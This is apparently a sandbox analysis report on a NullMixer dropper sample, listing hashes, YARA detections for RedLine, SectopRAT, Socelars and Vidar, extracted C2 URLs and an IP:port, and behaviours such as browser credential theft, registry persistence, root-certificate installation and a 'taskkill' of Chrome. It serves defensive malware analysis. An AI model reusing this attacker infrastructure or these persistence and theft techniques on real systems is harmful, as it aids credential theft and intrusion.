nullmixer | bdf727b2ac0b42a955c4744bf7768cbb9fa67167321e4fb5639ee5529ccbcfa4

Analysis

max time kernel
42s
max time network
151s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
25-11-2024 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
Size

4.3MB
MD5

9c7f6d97e7dc008682f6761744de856a
SHA1

7672d32df39901c605987f877494f977aab62be3
SHA256

bdf727b2ac0b42a955c4744bf7768cbb9fa67167321e4fb5639ee5529ccbcfa4
SHA512

68bb1ed43f233f6355147aeb3ad0de9cd6db06fb68c3694a38dbbe66d77ccaa7153d9ad6b4ec627fa7e90625c9d8e932c85d1460a012717c11b653b5a220f31b
SSDEEP

98304:xbCvLUBsgdN9yCAyppAGxBjWwjdo9dJmcX9kEVowd:xgLUCgdN06pZ2wjdVql6e

Score

10^/10

nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

nullmixer

http://znegs.xyz/

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

Build1

45.142.213.135:30058

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
Nullmixer family
nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Privateloader family
privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2484-280-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2484-277-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2484-275-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2484-283-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2484-281-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2484-280-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2484-277-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2484-275-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2484-283-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2484-281-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Socelars family
socelars

Socelars payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000600000001925b-13.dat	family_socelars
behavioral1/files/0x0005000000019551-97.dat	family_socelars
behavioral1/memory/2532-164-0x0000000000400000-0x0000000000B33000-memory.dmp	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/668-242-0x0000000000400000-0x0000000002CC9000-memory.dmp	family_vidar
behavioral1/memory/668-262-0x0000000000400000-0x0000000002CC9000-memory.dmp	family_vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3064	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral1/files/0x0008000000018bdd-25.dat	aspack_v212_v242
behavioral1/files/0x0007000000018780-27.dat	aspack_v212_v242
behavioral1/files/0x000600000001923e-34.dat	aspack_v212_v242

Executes dropped EXE 17 IoCs

Processes:

setup_install.exeb5203513d7.exe745d0d3ff9cc2c3.exeaae15d524bc2.exe5f9a813bc385231.exef65dc44f3b4.exea070c3838.exe438dc1669.exebf2e8642ac5.exea6168f1f756.exe5f9a813bc38523010.exe1cr.exe5f9a813bc385231.exechrome2.exesetup.exewinnetdriv.exeservices64.exe

pid	Process
2532	setup_install.exe
2348	b5203513d7.exe
668	745d0d3ff9cc2c3.exe
2716	aae15d524bc2.exe
2748	5f9a813bc385231.exe
1268	f65dc44f3b4.exe
1948	a070c3838.exe
1008	438dc1669.exe
1668	bf2e8642ac5.exe
1884	a6168f1f756.exe
1240	5f9a813bc38523010.exe
2936	1cr.exe
2940	5f9a813bc385231.exe
2196	chrome2.exe
984	setup.exe
1920	winnetdriv.exe
1424	services64.exe

Loads dropped DLL 49 IoCs

Processes:

9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exesetup_install.execmd.execmd.execmd.execmd.execmd.exe745d0d3ff9cc2c3.exeaae15d524bc2.execmd.execmd.exef65dc44f3b4.execmd.execmd.exebf2e8642ac5.exe5f9a813bc385231.execmd.exea6168f1f756.exe1cr.exe5f9a813bc385231.exeWerFault.exesetup.exechrome2.exe

pid	Process
1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2532	setup_install.exe
2928	cmd.exe
2744	cmd.exe
2260	cmd.exe
2260	cmd.exe
2660	cmd.exe
2660	cmd.exe
2720	cmd.exe
2720	cmd.exe
668	745d0d3ff9cc2c3.exe
668	745d0d3ff9cc2c3.exe
2716	aae15d524bc2.exe
2716	aae15d524bc2.exe
2764	cmd.exe
2692	cmd.exe
1268	f65dc44f3b4.exe
1268	f65dc44f3b4.exe
2864	cmd.exe
1904	cmd.exe
1668	bf2e8642ac5.exe
1668	bf2e8642ac5.exe
2748	5f9a813bc385231.exe
2748	5f9a813bc385231.exe
2552	cmd.exe
1884	a6168f1f756.exe
1884	a6168f1f756.exe
2748	5f9a813bc385231.exe
2936	1cr.exe
2936	1cr.exe
2940	5f9a813bc385231.exe
2940	5f9a813bc385231.exe
1320	WerFault.exe
1320	WerFault.exe
1320	WerFault.exe
1884	a6168f1f756.exe
1884	a6168f1f756.exe
1320	WerFault.exe
984	setup.exe
2196	chrome2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

438dc1669.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	438dc1669.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
84	iplogger.org
85	iplogger.org
116	raw.githubusercontent.com
117	raw.githubusercontent.com
21	iplogger.org
23	iplogger.org
54	iplogger.org
55	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
4	ipinfo.io
5	ipinfo.io
12	api.db-ip.com
13	api.db-ip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in Windows directory 2 IoCs

Processes:

setup.exe

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
1320	2532	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

bf2e8642ac5.exetaskkill.exewinnetdriv.execmd.execmd.execmd.exef65dc44f3b4.exe5f9a813bc385231.execmd.exe9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exesetup_install.exe745d0d3ff9cc2c3.exea6168f1f756.exe1cr.exe5f9a813bc385231.execmd.execmd.execmd.execmd.exeaae15d524bc2.execmd.exesetup.execmd.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bf2e8642ac5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnetdriv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f65dc44f3b4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f9a813bc385231.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	745d0d3ff9cc2c3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a6168f1f756.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f9a813bc385231.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aae15d524bc2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

745d0d3ff9cc2c3.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	745d0d3ff9cc2c3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	745d0d3ff9cc2c3.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
2604	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

745d0d3ff9cc2c3.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	745d0d3ff9cc2c3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	745d0d3ff9cc2c3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	745d0d3ff9cc2c3.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exe

pid	Process
796	schtasks.exe
1712	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

745d0d3ff9cc2c3.exechrome2.exe

pid	Process
668	745d0d3ff9cc2c3.exe
668	745d0d3ff9cc2c3.exe
668	745d0d3ff9cc2c3.exe
668	745d0d3ff9cc2c3.exe
2196	chrome2.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

bf2e8642ac5.exe5f9a813bc38523010.exeb5203513d7.exetaskkill.exechrome2.exe

description	pid	Process
Token: SeCreateTokenPrivilege	1668	bf2e8642ac5.exe
Token: SeAssignPrimaryTokenPrivilege	1668	bf2e8642ac5.exe
Token: SeLockMemoryPrivilege	1668	bf2e8642ac5.exe
Token: SeIncreaseQuotaPrivilege	1668	bf2e8642ac5.exe
Token: SeMachineAccountPrivilege	1668	bf2e8642ac5.exe
Token: SeTcbPrivilege	1668	bf2e8642ac5.exe
Token: SeSecurityPrivilege	1668	bf2e8642ac5.exe
Token: SeTakeOwnershipPrivilege	1668	bf2e8642ac5.exe
Token: SeLoadDriverPrivilege	1668	bf2e8642ac5.exe
Token: SeSystemProfilePrivilege	1668	bf2e8642ac5.exe
Token: SeSystemtimePrivilege	1668	bf2e8642ac5.exe
Token: SeProfSingleProcessPrivilege	1668	bf2e8642ac5.exe
Token: SeIncBasePriorityPrivilege	1668	bf2e8642ac5.exe
Token: SeCreatePagefilePrivilege	1668	bf2e8642ac5.exe
Token: SeCreatePermanentPrivilege	1668	bf2e8642ac5.exe
Token: SeBackupPrivilege	1668	bf2e8642ac5.exe
Token: SeRestorePrivilege	1668	bf2e8642ac5.exe
Token: SeShutdownPrivilege	1668	bf2e8642ac5.exe
Token: SeDebugPrivilege	1668	bf2e8642ac5.exe
Token: SeAuditPrivilege	1668	bf2e8642ac5.exe
Token: SeSystemEnvironmentPrivilege	1668	bf2e8642ac5.exe
Token: SeChangeNotifyPrivilege	1668	bf2e8642ac5.exe
Token: SeRemoteShutdownPrivilege	1668	bf2e8642ac5.exe
Token: SeUndockPrivilege	1668	bf2e8642ac5.exe
Token: SeSyncAgentPrivilege	1668	bf2e8642ac5.exe
Token: SeEnableDelegationPrivilege	1668	bf2e8642ac5.exe
Token: SeManageVolumePrivilege	1668	bf2e8642ac5.exe
Token: SeImpersonatePrivilege	1668	bf2e8642ac5.exe
Token: SeCreateGlobalPrivilege	1668	bf2e8642ac5.exe
Token: 31	1668	bf2e8642ac5.exe
Token: 32	1668	bf2e8642ac5.exe
Token: 33	1668	bf2e8642ac5.exe
Token: 34	1668	bf2e8642ac5.exe
Token: 35	1668	bf2e8642ac5.exe
Token: SeDebugPrivilege	1240	5f9a813bc38523010.exe
Token: SeDebugPrivilege	2348	b5203513d7.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2196	chrome2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exesetup_install.exe

description	pid	Process	procid_target
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 1712 wrote to memory of 2532	1712	9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe	30
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2260	2532	setup_install.exe	32
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2928	2532	setup_install.exe	33
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2720	2532	setup_install.exe	34
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2660	2532	setup_install.exe	35
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2864	2532	setup_install.exe	36
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 2744	2532	setup_install.exe	37
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 1904	2532	setup_install.exe	38
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2692	2532	setup_install.exe	39
PID 2532 wrote to memory of 2764	2532	setup_install.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 5f9a813bc385231.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
      5f9a813bc385231.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe" -a
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c aae15d524bc2.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2928
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\aae15d524bc2.exe
      aae15d524bc2.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c f65dc44f3b4.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\f65dc44f3b4.exe
      f65dc44f3b4.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 745d0d3ff9cc2c3.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2660
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe
      745d0d3ff9cc2c3.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      PID:668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c bf2e8642ac5.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\bf2e8642ac5.exe
      bf2e8642ac5.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2052
